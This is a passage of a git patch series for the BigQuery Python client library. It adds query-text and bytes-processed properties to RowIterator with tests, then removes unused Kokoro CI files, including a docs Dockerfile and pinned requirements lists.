processed from job statistics, if present. 
Returns: google.cloud.bigquery.table.RowIterator: @@ -4165,6 +4171,8 @@ def _list_rows_from_query_results( query_id=query_id, first_page_response=first_page_response, num_dml_affected_rows=num_dml_affected_rows, + query=query, + total_bytes_processed=total_bytes_processed, ) return row_iterator diff --git a/google/cloud/bigquery/job/query.py b/google/cloud/bigquery/job/query.py index ca2448eaa..a27c10530 100644 --- a/google/cloud/bigquery/job/query.py +++ b/google/cloud/bigquery/job/query.py @@ -1741,6 +1741,8 @@ def is_job_done(): query_id=self.query_id, first_page_response=first_page_response, num_dml_affected_rows=self._query_results.num_dml_affected_rows, + query=self.query, + total_bytes_processed=self.total_bytes_processed, **list_rows_kwargs, ) rows._preserve_order = _contains_order_by(self.query) diff --git a/google/cloud/bigquery/table.py b/google/cloud/bigquery/table.py index 9950b1a53..4d79d60da 100644 --- a/google/cloud/bigquery/table.py +++ b/google/cloud/bigquery/table.py @@ -1760,6 +1760,10 @@ class RowIterator(HTTPIterator): first_page_response (Optional[dict]): API response for the first page of results. These are returned when the first page is requested. + query (Optional[str]): + The query text used. + total_bytes_processed (Optinal[int]): + total bytes processed from job statistics, if present. 
""" def __init__( @@ -1781,6 +1785,8 @@ def __init__( query_id: Optional[str] = None, project: Optional[str] = None, num_dml_affected_rows: Optional[int] = None, + query: Optional[str] = None, + total_bytes_processed: Optional[int] = None, ): super(RowIterator, self).__init__( client, @@ -1808,6 +1814,8 @@ def __init__( self._query_id = query_id self._project = project self._num_dml_affected_rows = num_dml_affected_rows + self._query = query + self._total_bytes_processed = total_bytes_processed @property def _billing_project(self) -> Optional[str]: @@ -1855,6 +1863,16 @@ def query_id(self) -> Optional[str]: """ return self._query_id + @property + def query(self) -> Optional[str]: + """The query text used.""" + return self._query + + @property + def total_bytes_processed(self) -> Optional[int]: + """total bytes processed from job statistics, if present.""" + return self._total_bytes_processed + def _is_almost_completely_cached(self): """Check if all results are completely cached. diff --git a/tests/unit/job/test_query.py b/tests/unit/job/test_query.py index 4bbd31c73..1df65279d 100644 --- a/tests/unit/job/test_query.py +++ b/tests/unit/job/test_query.py @@ -887,6 +887,7 @@ def test_result_reloads_job_state_until_done(self): } job_resource = self._make_resource(started=True, location="EU") job_resource_done = self._make_resource(started=True, ended=True, location="EU") + job_resource_done["statistics"]["query"]["totalBytesProcessed"] = str(1234) job_resource_done["configuration"]["query"]["destinationTable"] = { "projectId": "dest-project", "datasetId": "dest_dataset", @@ -966,6 +967,8 @@ def test_result_reloads_job_state_until_done(self): # Test that the total_rows property has changed during iteration, based # on the response from tabledata.list. 
self.assertEqual(result.total_rows, 1) + self.assertEqual(result.query, job.query) + self.assertEqual(result.total_bytes_processed, 1234) query_results_path = f"/projects/{self.PROJECT}/queries/{self.JOB_ID}" query_results_call = mock.call( diff --git a/tests/unit/test_client.py b/tests/unit/test_client.py index 4f13d6ecc..34ef680dd 100644 --- a/tests/unit/test_client.py +++ b/tests/unit/test_client.py @@ -5517,6 +5517,7 @@ def test_query_and_wait_defaults(self): "totalRows": "1", "rows": [{"f": [{"v": "5552452"}]}], "queryId": "job_abcDEF_", + "totalBytesProcessed": 1234, } creds = _make_credentials() http = object() @@ -5532,6 +5533,8 @@ def test_query_and_wait_defaults(self): self.assertIsNone(rows.job_id) self.assertIsNone(rows.project) self.assertIsNone(rows.location) + self.assertEqual(rows.query, query) + self.assertEqual(rows.total_bytes_processed, 1234) # Verify the request we send is to jobs.query. conn.api_request.assert_called_once() From faeb51d48dd9de9d2378db1898f770130d51887d Mon Sep 17 00:00:00 2001 From: Anthonios Partheniou Date: Mon, 10 Mar 2025 11:02:52 -0400 Subject: [PATCH 073/202] chore: remove unused files (#2141) --- .github/.OwlBot.lock.yaml | 4 +- .kokoro/docker/docs/Dockerfile | 89 ----- .kokoro/docker/docs/fetch_gpg_keys.sh | 45 --- .kokoro/docker/docs/requirements.in | 2 - .kokoro/docker/docs/requirements.txt | 297 --------------- .kokoro/docs/common.cfg | 66 ---- .kokoro/docs/docs-presubmit.cfg | 28 -- .kokoro/docs/docs.cfg | 1 - .kokoro/publish-docs.sh | 58 --- .kokoro/release.sh | 29 -- .kokoro/release/common.cfg | 43 --- .kokoro/release/release.cfg | 1 - .kokoro/requirements.in | 11 - .kokoro/requirements.txt | 513 -------------------------- 14 files changed, 2 insertions(+), 1185 deletions(-) delete mode 100644 .kokoro/docker/docs/Dockerfile delete mode 100755 .kokoro/docker/docs/fetch_gpg_keys.sh delete mode 100644 .kokoro/docker/docs/requirements.in delete mode 100644 .kokoro/docker/docs/requirements.txt delete mode 100644 
.kokoro/docs/common.cfg delete mode 100644 .kokoro/docs/docs-presubmit.cfg delete mode 100644 .kokoro/docs/docs.cfg delete mode 100755 .kokoro/publish-docs.sh delete mode 100755 .kokoro/release.sh delete mode 100644 .kokoro/release/common.cfg delete mode 100644 .kokoro/release/release.cfg delete mode 100644 .kokoro/requirements.in delete mode 100644 .kokoro/requirements.txt diff --git a/.github/.OwlBot.lock.yaml b/.github/.OwlBot.lock.yaml index 3f7634f25..9d743afe8 100644 --- a/.github/.OwlBot.lock.yaml +++ b/.github/.OwlBot.lock.yaml @@ -13,5 +13,5 @@ # limitations under the License. docker: image: gcr.io/cloud-devrel-public-resources/owlbot-python:latest - digest: sha256:f016446d6e520e5fb552c45b110cba3f217bffdd3d06bdddd076e9e6d13266cf -# created: 2025-02-21T19:32:52.01306189Z + digest: sha256:5581906b957284864632cde4e9c51d1cc66b0094990b27e689132fe5cd036046 +# created: 2025-03-07 diff --git a/.kokoro/docker/docs/Dockerfile b/.kokoro/docker/docs/Dockerfile deleted file mode 100644 index e5410e296..000000000 --- a/.kokoro/docker/docs/Dockerfile +++ /dev/null @@ -1,89 +0,0 @@ -# Copyright 2024 Google LLC -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. - -from ubuntu:24.04 - -ENV DEBIAN_FRONTEND noninteractive - -# Ensure local Python is preferred over distribution Python. -ENV PATH /usr/local/bin:$PATH - -# Install dependencies. 
-RUN apt-get update \ - && apt-get install -y --no-install-recommends \ - apt-transport-https \ - build-essential \ - ca-certificates \ - curl \ - dirmngr \ - git \ - gpg-agent \ - graphviz \ - libbz2-dev \ - libdb5.3-dev \ - libexpat1-dev \ - libffi-dev \ - liblzma-dev \ - libreadline-dev \ - libsnappy-dev \ - libssl-dev \ - libsqlite3-dev \ - portaudio19-dev \ - redis-server \ - software-properties-common \ - ssh \ - sudo \ - tcl \ - tcl-dev \ - tk \ - tk-dev \ - uuid-dev \ - wget \ - zlib1g-dev \ - && add-apt-repository universe \ - && apt-get update \ - && apt-get -y install jq \ - && apt-get clean autoclean \ - && apt-get autoremove -y \ - && rm -rf /var/lib/apt/lists/* \ - && rm -f /var/cache/apt/archives/*.deb - - -###################### Install python 3.10.14 for docs/docfx session - -# Download python 3.10.14 -RUN wget https://www.python.org/ftp/python/3.10.14/Python-3.10.14.tgz - -# Extract files -RUN tar -xvf Python-3.10.14.tgz - -# Install python 3.10.14 -RUN ./Python-3.10.14/configure --enable-optimizations -RUN make altinstall - -ENV PATH /usr/local/bin/python3.10:$PATH - -###################### Install pip -RUN wget -O /tmp/get-pip.py 'https://bootstrap.pypa.io/get-pip.py' \ - && python3.10 /tmp/get-pip.py \ - && rm /tmp/get-pip.py - -# Test pip -RUN python3.10 -m pip - -# Install build requirements -COPY requirements.txt /requirements.txt -RUN python3.10 -m pip install --require-hashes -r requirements.txt - -CMD ["python3.10"] diff --git a/.kokoro/docker/docs/fetch_gpg_keys.sh b/.kokoro/docker/docs/fetch_gpg_keys.sh deleted file mode 100755 index d653dd868..000000000 --- a/.kokoro/docker/docs/fetch_gpg_keys.sh +++ /dev/null @@ -1,45 +0,0 @@ -#!/bin/bash -# Copyright 2020 Google LLC -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. 
-# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. - -# A script to fetch gpg keys with retry. -# Avoid jinja parsing the file. -# - -function retry { - if [[ "${#}" -le 1 ]]; then - echo "Usage: ${0} retry_count commands.." - exit 1 - fi - local retries=${1} - local command="${@:2}" - until [[ "${retries}" -le 0 ]]; do - $command && return 0 - if [[ $? -ne 0 ]]; then - echo "command failed, retrying" - ((retries--)) - fi - done - return 1 -} - -# 3.6.9, 3.7.5 (Ned Deily) -retry 3 gpg --keyserver ha.pool.sks-keyservers.net --recv-keys \ - 0D96DF4D4110E5C43FBFB17F2D347EA6AA65421D - -# 3.8.0 (Łukasz Langa) -retry 3 gpg --keyserver ha.pool.sks-keyservers.net --recv-keys \ - E3FF2839C048B25C084DEBE9B26995E310250568 - -# diff --git a/.kokoro/docker/docs/requirements.in b/.kokoro/docker/docs/requirements.in deleted file mode 100644 index 586bd0703..000000000 --- a/.kokoro/docker/docs/requirements.in +++ /dev/null @@ -1,2 +0,0 @@ -nox -gcp-docuploader diff --git a/.kokoro/docker/docs/requirements.txt b/.kokoro/docker/docs/requirements.txt deleted file mode 100644 index a9360a25b..000000000 --- a/.kokoro/docker/docs/requirements.txt +++ /dev/null @@ -1,297 +0,0 @@ -# -# This file is autogenerated by pip-compile with Python 3.10 -# by the following command: -# -# pip-compile --allow-unsafe --generate-hashes requirements.in -# -argcomplete==3.5.3 \ - --hash=sha256:2ab2c4a215c59fd6caaff41a869480a23e8f6a5f910b266c1808037f4e375b61 \ - --hash=sha256:c12bf50eded8aebb298c7b7da7a5ff3ee24dffd9f5281867dfe1424b58c55392 - # via nox -cachetools==5.5.0 \ - 
--hash=sha256:02134e8439cdc2ffb62023ce1debca2944c3f289d66bb17ead3ab3dede74b292 \ - --hash=sha256:2cc24fb4cbe39633fb7badd9db9ca6295d766d9c2995f245725a46715d050f2a - # via google-auth -certifi==2024.12.14 \ - --hash=sha256:1275f7a45be9464efc1173084eaa30f866fe2e47d389406136d332ed4967ec56 \ - --hash=sha256:b650d30f370c2b724812bee08008be0c4163b163ddaec3f2546c1caf65f191db - # via requests -charset-normalizer==3.4.1 \ - --hash=sha256:0167ddc8ab6508fe81860a57dd472b2ef4060e8d378f0cc555707126830f2537 \ - --hash=sha256:01732659ba9b5b873fc117534143e4feefecf3b2078b0a6a2e925271bb6f4cfa \ - --hash=sha256:01ad647cdd609225c5350561d084b42ddf732f4eeefe6e678765636791e78b9a \ - --hash=sha256:04432ad9479fa40ec0f387795ddad4437a2b50417c69fa275e212933519ff294 \ - --hash=sha256:0907f11d019260cdc3f94fbdb23ff9125f6b5d1039b76003b5b0ac9d6a6c9d5b \ - --hash=sha256:0924e81d3d5e70f8126529951dac65c1010cdf117bb75eb02dd12339b57749dd \ - --hash=sha256:09b26ae6b1abf0d27570633b2b078a2a20419c99d66fb2823173d73f188ce601 \ - --hash=sha256:09b5e6733cbd160dcc09589227187e242a30a49ca5cefa5a7edd3f9d19ed53fd \ - --hash=sha256:0af291f4fe114be0280cdd29d533696a77b5b49cfde5467176ecab32353395c4 \ - --hash=sha256:0f55e69f030f7163dffe9fd0752b32f070566451afe180f99dbeeb81f511ad8d \ - --hash=sha256:1a2bc9f351a75ef49d664206d51f8e5ede9da246602dc2d2726837620ea034b2 \ - --hash=sha256:22e14b5d70560b8dd51ec22863f370d1e595ac3d024cb8ad7d308b4cd95f8313 \ - --hash=sha256:234ac59ea147c59ee4da87a0c0f098e9c8d169f4dc2a159ef720f1a61bbe27cd \ - --hash=sha256:2369eea1ee4a7610a860d88f268eb39b95cb588acd7235e02fd5a5601773d4fa \ - --hash=sha256:237bdbe6159cff53b4f24f397d43c6336c6b0b42affbe857970cefbb620911c8 \ - --hash=sha256:28bf57629c75e810b6ae989f03c0828d64d6b26a5e205535585f96093e405ed1 \ - --hash=sha256:2967f74ad52c3b98de4c3b32e1a44e32975e008a9cd2a8cc8966d6a5218c5cb2 \ - --hash=sha256:2a75d49014d118e4198bcee5ee0a6f25856b29b12dbf7cd012791f8a6cc5c496 \ - --hash=sha256:2bdfe3ac2e1bbe5b59a1a63721eb3b95fc9b6817ae4a46debbb4e11f6232428d \ - 
--hash=sha256:2d074908e1aecee37a7635990b2c6d504cd4766c7bc9fc86d63f9c09af3fa11b \ - --hash=sha256:2fb9bd477fdea8684f78791a6de97a953c51831ee2981f8e4f583ff3b9d9687e \ - --hash=sha256:311f30128d7d333eebd7896965bfcfbd0065f1716ec92bd5638d7748eb6f936a \ - --hash=sha256:329ce159e82018d646c7ac45b01a430369d526569ec08516081727a20e9e4af4 \ - --hash=sha256:345b0426edd4e18138d6528aed636de7a9ed169b4aaf9d61a8c19e39d26838ca \ - --hash=sha256:363e2f92b0f0174b2f8238240a1a30142e3db7b957a5dd5689b0e75fb717cc78 \ - --hash=sha256:3a3bd0dcd373514dcec91c411ddb9632c0d7d92aed7093b8c3bbb6d69ca74408 \ - --hash=sha256:3bed14e9c89dcb10e8f3a29f9ccac4955aebe93c71ae803af79265c9ca5644c5 \ - --hash=sha256:44251f18cd68a75b56585dd00dae26183e102cd5e0f9f1466e6df5da2ed64ea3 \ - --hash=sha256:44ecbf16649486d4aebafeaa7ec4c9fed8b88101f4dd612dcaf65d5e815f837f \ - --hash=sha256:4532bff1b8421fd0a320463030c7520f56a79c9024a4e88f01c537316019005a \ - --hash=sha256:49402233c892a461407c512a19435d1ce275543138294f7ef013f0b63d5d3765 \ - --hash=sha256:4c0907b1928a36d5a998d72d64d8eaa7244989f7aaaf947500d3a800c83a3fd6 \ - --hash=sha256:4d86f7aff21ee58f26dcf5ae81a9addbd914115cdebcbb2217e4f0ed8982e146 \ - --hash=sha256:5777ee0881f9499ed0f71cc82cf873d9a0ca8af166dfa0af8ec4e675b7df48e6 \ - --hash=sha256:5df196eb874dae23dcfb968c83d4f8fdccb333330fe1fc278ac5ceeb101003a9 \ - --hash=sha256:619a609aa74ae43d90ed2e89bdd784765de0a25ca761b93e196d938b8fd1dbbd \ - --hash=sha256:6e27f48bcd0957c6d4cb9d6fa6b61d192d0b13d5ef563e5f2ae35feafc0d179c \ - --hash=sha256:6ff8a4a60c227ad87030d76e99cd1698345d4491638dfa6673027c48b3cd395f \ - --hash=sha256:73d94b58ec7fecbc7366247d3b0b10a21681004153238750bb67bd9012414545 \ - --hash=sha256:7461baadb4dc00fd9e0acbe254e3d7d2112e7f92ced2adc96e54ef6501c5f176 \ - --hash=sha256:75832c08354f595c760a804588b9357d34ec00ba1c940c15e31e96d902093770 \ - --hash=sha256:7709f51f5f7c853f0fb938bcd3bc59cdfdc5203635ffd18bf354f6967ea0f824 \ - --hash=sha256:78baa6d91634dfb69ec52a463534bc0df05dbd546209b79a3880a34487f4b84f \ - 
--hash=sha256:7974a0b5ecd505609e3b19742b60cee7aa2aa2fb3151bc917e6e2646d7667dcf \ - --hash=sha256:7a4f97a081603d2050bfaffdefa5b02a9ec823f8348a572e39032caa8404a487 \ - --hash=sha256:7b1bef6280950ee6c177b326508f86cad7ad4dff12454483b51d8b7d673a2c5d \ - --hash=sha256:7d053096f67cd1241601111b698f5cad775f97ab25d81567d3f59219b5f1adbd \ - --hash=sha256:804a4d582ba6e5b747c625bf1255e6b1507465494a40a2130978bda7b932c90b \ - --hash=sha256:807f52c1f798eef6cf26beb819eeb8819b1622ddfeef9d0977a8502d4db6d534 \ - --hash=sha256:80ed5e856eb7f30115aaf94e4a08114ccc8813e6ed1b5efa74f9f82e8509858f \ - --hash=sha256:8417cb1f36cc0bc7eaba8ccb0e04d55f0ee52df06df3ad55259b9a323555fc8b \ - --hash=sha256:8436c508b408b82d87dc5f62496973a1805cd46727c34440b0d29d8a2f50a6c9 \ - --hash=sha256:89149166622f4db9b4b6a449256291dc87a99ee53151c74cbd82a53c8c2f6ccd \ - --hash=sha256:8bfa33f4f2672964266e940dd22a195989ba31669bd84629f05fab3ef4e2d125 \ - --hash=sha256:8c60ca7339acd497a55b0ea5d506b2a2612afb2826560416f6894e8b5770d4a9 \ - --hash=sha256:91b36a978b5ae0ee86c394f5a54d6ef44db1de0815eb43de826d41d21e4af3de \ - --hash=sha256:955f8851919303c92343d2f66165294848d57e9bba6cf6e3625485a70a038d11 \ - --hash=sha256:97f68b8d6831127e4787ad15e6757232e14e12060bec17091b85eb1486b91d8d \ - --hash=sha256:9b23ca7ef998bc739bf6ffc077c2116917eabcc901f88da1b9856b210ef63f35 \ - --hash=sha256:9f0b8b1c6d84c8034a44893aba5e767bf9c7a211e313a9605d9c617d7083829f \ - --hash=sha256:aabfa34badd18f1da5ec1bc2715cadc8dca465868a4e73a0173466b688f29dda \ - --hash=sha256:ab36c8eb7e454e34e60eb55ca5d241a5d18b2c6244f6827a30e451c42410b5f7 \ - --hash=sha256:b010a7a4fd316c3c484d482922d13044979e78d1861f0e0650423144c616a46a \ - --hash=sha256:b1ac5992a838106edb89654e0aebfc24f5848ae2547d22c2c3f66454daa11971 \ - --hash=sha256:b7b2d86dd06bfc2ade3312a83a5c364c7ec2e3498f8734282c6c3d4b07b346b8 \ - --hash=sha256:b97e690a2118911e39b4042088092771b4ae3fc3aa86518f84b8cf6888dbdb41 \ - --hash=sha256:bc2722592d8998c870fa4e290c2eec2c1569b87fe58618e67d38b4665dfa680d \ - 
--hash=sha256:c0429126cf75e16c4f0ad00ee0eae4242dc652290f940152ca8c75c3a4b6ee8f \ - --hash=sha256:c30197aa96e8eed02200a83fba2657b4c3acd0f0aa4bdc9f6c1af8e8962e0757 \ - --hash=sha256:c4c3e6da02df6fa1410a7680bd3f63d4f710232d3139089536310d027950696a \ - --hash=sha256:c75cb2a3e389853835e84a2d8fb2b81a10645b503eca9bcb98df6b5a43eb8886 \ - --hash=sha256:c96836c97b1238e9c9e3fe90844c947d5afbf4f4c92762679acfe19927d81d77 \ - --hash=sha256:d7f50a1f8c450f3925cb367d011448c39239bb3eb4117c36a6d354794de4ce76 \ - --hash=sha256:d973f03c0cb71c5ed99037b870f2be986c3c05e63622c017ea9816881d2dd247 \ - --hash=sha256:d98b1668f06378c6dbefec3b92299716b931cd4e6061f3c875a71ced1780ab85 \ - --hash=sha256:d9c3cdf5390dcd29aa8056d13e8e99526cda0305acc038b96b30352aff5ff2bb \ - --hash=sha256:dad3e487649f498dd991eeb901125411559b22e8d7ab25d3aeb1af367df5efd7 \ - --hash=sha256:dccbe65bd2f7f7ec22c4ff99ed56faa1e9f785482b9bbd7c717e26fd723a1d1e \ - --hash=sha256:dd78cfcda14a1ef52584dbb008f7ac81c1328c0f58184bf9a84c49c605002da6 \ - --hash=sha256:e218488cd232553829be0664c2292d3af2eeeb94b32bea483cf79ac6a694e037 \ - --hash=sha256:e358e64305fe12299a08e08978f51fc21fac060dcfcddd95453eabe5b93ed0e1 \ - --hash=sha256:ea0d8d539afa5eb2728aa1932a988a9a7af94f18582ffae4bc10b3fbdad0626e \ - --hash=sha256:eab677309cdb30d047996b36d34caeda1dc91149e4fdca0b1a039b3f79d9a807 \ - --hash=sha256:eb8178fe3dba6450a3e024e95ac49ed3400e506fd4e9e5c32d30adda88cbd407 \ - --hash=sha256:ecddf25bee22fe4fe3737a399d0d177d72bc22be6913acfab364b40bce1ba83c \ - --hash=sha256:eea6ee1db730b3483adf394ea72f808b6e18cf3cb6454b4d86e04fa8c4327a12 \ - --hash=sha256:f08ff5e948271dc7e18a35641d2f11a4cd8dfd5634f55228b691e62b37125eb3 \ - --hash=sha256:f30bf9fd9be89ecb2360c7d94a711f00c09b976258846efe40db3d05828e8089 \ - --hash=sha256:fa88b843d6e211393a37219e6a1c1df99d35e8fd90446f1118f4216e307e48cd \ - --hash=sha256:fc54db6c8593ef7d4b2a331b58653356cf04f67c960f584edb7c3d8c97e8f39e \ - --hash=sha256:fd4ec41f914fa74ad1b8304bbc634b3de73d2a0889bd32076342a573e0779e00 \ - 
--hash=sha256:ffc9202a29ab3920fa812879e95a9e78b2465fd10be7fcbd042899695d75e616 - # via requests -click==8.1.8 \ - --hash=sha256:63c132bbbed01578a06712a2d1f497bb62d9c1c0d329b7903a866228027263b2 \ - --hash=sha256:ed53c9d8990d83c2a27deae68e4ee337473f6330c040a31d4225c9574d16096a - # via gcp-docuploader -colorlog==6.9.0 \ - --hash=sha256:5906e71acd67cb07a71e779c47c4bcb45fb8c2993eebe9e5adcd6a6f1b283eff \ - --hash=sha256:bfba54a1b93b94f54e1f4fe48395725a3d92fd2a4af702f6bd70946bdc0c6ac2 - # via - # gcp-docuploader - # nox -distlib==0.3.9 \ - --hash=sha256:47f8c22fd27c27e25a65601af709b38e4f0a45ea4fc2e710f65755fa8caaaf87 \ - --hash=sha256:a60f20dea646b8a33f3e7772f74dc0b2d0772d2837ee1342a00645c81edf9403 - # via virtualenv -filelock==3.16.1 \ - --hash=sha256:2082e5703d51fbf98ea75855d9d5527e33d8ff23099bec374a134febee6946b0 \ - --hash=sha256:c249fbfcd5db47e5e2d6d62198e565475ee65e4831e2561c8e313fa7eb961435 - # via virtualenv -gcp-docuploader==0.6.5 \ - --hash=sha256:30221d4ac3e5a2b9c69aa52fdbef68cc3f27d0e6d0d90e220fc024584b8d2318 \ - --hash=sha256:b7458ef93f605b9d46a4bf3a8dc1755dad1f31d030c8679edf304e343b347eea - # via -r requirements.in -google-api-core==2.24.0 \ - --hash=sha256:10d82ac0fca69c82a25b3efdeefccf6f28e02ebb97925a8cce8edbfe379929d9 \ - --hash=sha256:e255640547a597a4da010876d333208ddac417d60add22b6851a0c66a831fcaf - # via - # google-cloud-core - # google-cloud-storage -google-auth==2.37.0 \ - --hash=sha256:0054623abf1f9c83492c63d3f47e77f0a544caa3d40b2d98e099a611c2dd5d00 \ - --hash=sha256:42664f18290a6be591be5329a96fe30184be1a1badb7292a7f686a9659de9ca0 - # via - # google-api-core - # google-cloud-core - # google-cloud-storage -google-cloud-core==2.4.1 \ - --hash=sha256:9b7749272a812bde58fff28868d0c5e2f585b82f37e09a1f6ed2d4d10f134073 \ - --hash=sha256:a9e6a4422b9ac5c29f79a0ede9485473338e2ce78d91f2370c01e730eab22e61 - # via google-cloud-storage -google-cloud-storage==2.19.0 \ - --hash=sha256:aeb971b5c29cf8ab98445082cbfe7b161a1f48ed275822f59ed3f1524ea54fba \ - 
--hash=sha256:cd05e9e7191ba6cb68934d8eb76054d9be4562aa89dbc4236feee4d7d51342b2 - # via gcp-docuploader -google-crc32c==1.6.0 \ - --hash=sha256:05e2d8c9a2f853ff116db9706b4a27350587f341eda835f46db3c0a8c8ce2f24 \ - --hash=sha256:18e311c64008f1f1379158158bb3f0c8d72635b9eb4f9545f8cf990c5668e59d \ - --hash=sha256:236c87a46cdf06384f614e9092b82c05f81bd34b80248021f729396a78e55d7e \ - --hash=sha256:35834855408429cecf495cac67ccbab802de269e948e27478b1e47dfb6465e57 \ - --hash=sha256:386122eeaaa76951a8196310432c5b0ef3b53590ef4c317ec7588ec554fec5d2 \ - --hash=sha256:40b05ab32a5067525670880eb5d169529089a26fe35dce8891127aeddc1950e8 \ - --hash=sha256:48abd62ca76a2cbe034542ed1b6aee851b6f28aaca4e6551b5599b6f3ef175cc \ - --hash=sha256:50cf2a96da226dcbff8671233ecf37bf6e95de98b2a2ebadbfdf455e6d05df42 \ - --hash=sha256:51c4f54dd8c6dfeb58d1df5e4f7f97df8abf17a36626a217f169893d1d7f3e9f \ - --hash=sha256:5bcc90b34df28a4b38653c36bb5ada35671ad105c99cfe915fb5bed7ad6924aa \ - --hash=sha256:62f6d4a29fea082ac4a3c9be5e415218255cf11684ac6ef5488eea0c9132689b \ - --hash=sha256:6eceb6ad197656a1ff49ebfbbfa870678c75be4344feb35ac1edf694309413dc \ - --hash=sha256:7aec8e88a3583515f9e0957fe4f5f6d8d4997e36d0f61624e70469771584c760 \ - --hash=sha256:91ca8145b060679ec9176e6de4f89b07363d6805bd4760631ef254905503598d \ - --hash=sha256:a184243544811e4a50d345838a883733461e67578959ac59964e43cca2c791e7 \ - --hash=sha256:a9e4b426c3702f3cd23b933436487eb34e01e00327fac20c9aebb68ccf34117d \ - --hash=sha256:bb0966e1c50d0ef5bc743312cc730b533491d60585a9a08f897274e57c3f70e0 \ - --hash=sha256:bb8b3c75bd157010459b15222c3fd30577042a7060e29d42dabce449c087f2b3 \ - --hash=sha256:bd5e7d2445d1a958c266bfa5d04c39932dc54093fa391736dbfdb0f1929c1fb3 \ - --hash=sha256:c87d98c7c4a69066fd31701c4e10d178a648c2cac3452e62c6b24dc51f9fcc00 \ - --hash=sha256:d2952396dc604544ea7476b33fe87faedc24d666fb0c2d5ac971a2b9576ab871 \ - --hash=sha256:d8797406499f28b5ef791f339594b0b5fdedf54e203b5066675c406ba69d705c \ - 
--hash=sha256:d9e9913f7bd69e093b81da4535ce27af842e7bf371cde42d1ae9e9bd382dc0e9 \ - --hash=sha256:e2806553238cd076f0a55bddab37a532b53580e699ed8e5606d0de1f856b5205 \ - --hash=sha256:ebab974b1687509e5c973b5c4b8b146683e101e102e17a86bd196ecaa4d099fc \ - --hash=sha256:ed767bf4ba90104c1216b68111613f0d5926fb3780660ea1198fc469af410e9d \ - --hash=sha256:f7a1fc29803712f80879b0806cb83ab24ce62fc8daf0569f2204a0cfd7f68ed4 - # via - # google-cloud-storage - # google-resumable-media -google-resumable-media==2.7.2 \ - --hash=sha256:3ce7551e9fe6d99e9a126101d2536612bb73486721951e9562fee0f90c6ababa \ - --hash=sha256:5280aed4629f2b60b847b0d42f9857fd4935c11af266744df33d8074cae92fe0 - # via google-cloud-storage -googleapis-common-protos==1.66.0 \ - --hash=sha256:c3e7b33d15fdca5374cc0a7346dd92ffa847425cc4ea941d970f13680052ec8c \ - --hash=sha256:d7abcd75fabb2e0ec9f74466401f6c119a0b498e27370e9be4c94cb7e382b8ed - # via google-api-core -idna==3.10 \ - --hash=sha256:12f65c9b470abda6dc35cf8e63cc574b1c52b11df2c86030af0ac09b01b13ea9 \ - --hash=sha256:946d195a0d259cbba61165e88e65941f16e9b36ea6ddb97f00452bae8b1287d3 - # via requests -nox==2024.10.9 \ - --hash=sha256:1d36f309a0a2a853e9bccb76bbef6bb118ba92fa92674d15604ca99adeb29eab \ - --hash=sha256:7aa9dc8d1c27e9f45ab046ffd1c3b2c4f7c91755304769df231308849ebded95 - # via -r requirements.in -packaging==24.2 \ - --hash=sha256:09abb1bccd265c01f4a3aa3f7a7db064b36514d2cba19a2f694fe6150451a759 \ - --hash=sha256:c228a6dc5e932d346bc5739379109d49e8853dd8223571c7c5b55260edc0b97f - # via nox -platformdirs==4.3.6 \ - --hash=sha256:357fb2acbc885b0419afd3ce3ed34564c13c9b95c89360cd9563f73aa5e2b907 \ - --hash=sha256:73e575e1408ab8103900836b97580d5307456908a03e92031bab39e4554cc3fb - # via virtualenv -proto-plus==1.25.0 \ - --hash=sha256:c91fc4a65074ade8e458e95ef8bac34d4008daa7cce4a12d6707066fca648961 \ - --hash=sha256:fbb17f57f7bd05a68b7707e745e26528b0b3c34e378db91eef93912c54982d91 - # via google-api-core -protobuf==5.29.3 \ - 
--hash=sha256:0a18ed4a24198528f2333802eb075e59dea9d679ab7a6c5efb017a59004d849f \ - --hash=sha256:0eb32bfa5219fc8d4111803e9a690658aa2e6366384fd0851064b963b6d1f2a7 \ - --hash=sha256:3ea51771449e1035f26069c4c7fd51fba990d07bc55ba80701c78f886bf9c888 \ - --hash=sha256:5da0f41edaf117bde316404bad1a486cb4ededf8e4a54891296f648e8e076620 \ - --hash=sha256:6ce8cc3389a20693bfde6c6562e03474c40851b44975c9b2bf6df7d8c4f864da \ - --hash=sha256:84a57163a0ccef3f96e4b6a20516cedcf5bb3a95a657131c5c3ac62200d23252 \ - --hash=sha256:a4fa6f80816a9a0678429e84973f2f98cbc218cca434abe8db2ad0bffc98503a \ - --hash=sha256:a8434404bbf139aa9e1300dbf989667a83d42ddda9153d8ab76e0d5dcaca484e \ - --hash=sha256:b89c115d877892a512f79a8114564fb435943b59067615894c3b13cd3e1fa107 \ - --hash=sha256:c027e08a08be10b67c06bf2370b99c811c466398c357e615ca88c91c07f0910f \ - --hash=sha256:daaf63f70f25e8689c072cfad4334ca0ac1d1e05a92fc15c54eb9cf23c3efd84 - # via - # gcp-docuploader - # google-api-core - # googleapis-common-protos - # proto-plus -pyasn1==0.6.1 \ - --hash=sha256:0d632f46f2ba09143da3a8afe9e33fb6f92fa2320ab7e886e2d0f7672af84629 \ - --hash=sha256:6f580d2bdd84365380830acf45550f2511469f673cb4a5ae3857a3170128b034 - # via - # pyasn1-modules - # rsa -pyasn1-modules==0.4.1 \ - --hash=sha256:49bfa96b45a292b711e986f222502c1c9a5e1f4e568fc30e2574a6c7d07838fd \ - --hash=sha256:c28e2dbf9c06ad61c71a075c7e0f9fd0f1b0bb2d2ad4377f240d33ac2ab60a7c - # via google-auth -requests==2.32.3 \ - --hash=sha256:55365417734eb18255590a9ff9eb97e9e1da868d4ccd6402399eaf68af20a760 \ - --hash=sha256:70761cfe03c773ceb22aa2f671b4757976145175cdfca038c02654d061d6dcc6 - # via - # google-api-core - # google-cloud-storage -rsa==4.9 \ - --hash=sha256:90260d9058e514786967344d0ef75fa8727eed8a7d2e43ce9f4bcf1b536174f7 \ - --hash=sha256:e38464a49c6c85d7f1351b0126661487a7e0a14a50f1675ec50eb34d4f20ef21 - # 